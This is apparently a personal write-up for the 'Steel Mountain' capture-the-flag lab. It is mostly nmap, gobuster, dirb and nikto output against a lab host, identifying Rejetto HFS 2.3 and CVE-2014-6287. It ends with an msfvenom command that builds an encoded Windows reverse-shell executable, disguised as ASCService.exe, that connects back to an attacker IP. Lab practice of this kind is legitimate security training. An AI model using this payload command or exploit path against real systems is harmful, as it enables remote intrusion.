-
Notifications
You must be signed in to change notification settings - Fork 0
/
Steel mountain
176 lines (142 loc) · 6.92 KB
/
Steel mountain
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
#Steel Mountain
nmap:
Scanning 10.10.54.15 [1000 ports]
Discovered open port 80/tcp on 10.10.54.15
Discovered open port 8080/tcp on 10.10.54.15
Discovered open port 135/tcp on 10.10.54.15
Discovered open port 3389/tcp on 10.10.54.15
Discovered open port 445/tcp on 10.10.54.15
Discovered open port 139/tcp on 10.10.54.15
Discovered open port 49153/tcp on 10.10.54.15
Discovered open port 49152/tcp on 10.10.54.15
Discovered open port 49155/tcp on 10.10.54.15
Discovered open port 49154/tcp on 10.10.54.15
Discovered open port 49157/tcp on 10.10.54.15
Completed SYN Stealth Scan at 11:45, 35.22s elapsed (1000 total ports)
Initiating Service scan at 11:45
Scanning 11 services on 10.10.54.15
Service scan Timing: About 63.64% done; ETC: 11:46 (0:00:35 remaining)
Completed Service scan at 11:46, 63.03s elapsed (11 services on 1 host)
Initiating OS detection (try #1) against 10.10.54.15
Retrying OS detection (try #2) against 10.10.54.15
adjust_timeouts2: packet supposedly had rtt of -379516 microseconds. Ignoring time.
adjust_timeouts2: packet supposedly had rtt of -379516 microseconds. Ignoring time.
Retrying OS detection (try #3) against 10.10.54.15
Initiating Traceroute at 11:46
Completed Traceroute at 11:46, 0.23s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:46
Completed Parallel DNS resolution of 2 hosts. at 11:46, 0.08s elapsed
NSE: Script scanning 10.10.54.15.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:46
Completed NSE at 11:46, 10.51s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:46
NSE Timing: About 98.86% done; ETC: 11:47 (0:00:00 remaining)
Completed NSE at 11:47, 60.02s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:47
Completed NSE at 11:47, 0.00s elapsed
Nmap scan report for 10.10.54.15
Host is up, received reset ttl 127 (0.22s latency).
Scanned at 2020-10-17 11:44:36 EDT for 181s
Not shown: 989 closed ports
Reason: 989 resets
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 127 Microsoft IIS httpd 8.5
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Site doesn't have a title (text/html).
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp open microsoft-ds syn-ack ttl 127 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
3389/tcp open ssl/ms-wbt-server? syn-ack ttl 127
|_ssl-date: 2020-10-17T15:46:38+00:00; 0s from scanner time.
8080/tcp open http syn-ack ttl 127 HttpFileServer httpd 2.3
| http-methods:
|_ Supported Methods: GET HEAD POST
|_http-server-header: HFS 2.3
|_http-title: HFS /
49152/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49153/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49154/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49155/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
49157/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
OS fingerprint not ideal because: maxTimingRatio (1.512000e+00) is greater than 1.4
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (93%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%), Microsoft Windows Server 2008 R2 SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=10/17%OT=80%CT=1%CU=40069%PV=Y%DS=2%DC=T%G=N%TM=5F8B1219%P=x86_64-pc-linux-gnu)
SEQ(SP=102%GCD=1%ISR=109%CI=I%II=I%TS=7)
SEQ(SP=101%GCD=1%ISR=109%CI=RD%TS=7)
SEQ(SP=103%GCD=1%ISR=106%TI=RD%TS=A)
OPS(O1=M508NW8ST11%O2=M508NW8ST11%O3=M508NW8NNT11%O4=M508NW8ST11%O5=M508NW8ST11%O6=M508ST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%T=80%W=2000%O=M508NW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.001 days (since Sat Oct 17 11:45:41 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: Randomized
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 0s, deviation: 0s, median: 0s
| nbstat: NetBIOS name: STEELMOUNTAIN, NetBIOS user: <unknown>, NetBIOS MAC: 02:39:fe:d3:9a:09 (unknown)
| Names:
| STEELMOUNTAIN<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| STEELMOUNTAIN<20> Flags: <unique><active>
| Statistics:
| 02 39 fe d3 9a 09 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 37222/tcp): CLEAN (Couldn't connect)
| Check 2 (port 41680/tcp): CLEAN (Couldn't connect)
| Check 3 (port 10376/udp): CLEAN (Timeout)
| Check 4 (port 47254/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-17T15:46:28
|_ start_date: 2020-10-17T15:40:08
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 220.33 ms 10.9.0.1
2 220.36 ms 10.10.54.15
gobuster:
nothing to be noticed
just /img found
dirb:
nothing
nikto:
+ Server: Microsoft-IIS/8.5
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
manual search:
file server running at 8080 port rejetto http file server
cve-2014-6287
msfvenom paload:
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.166.62 LPORT=4443 -e x86/shikata_ga_nai -f exe -o ASCService.exe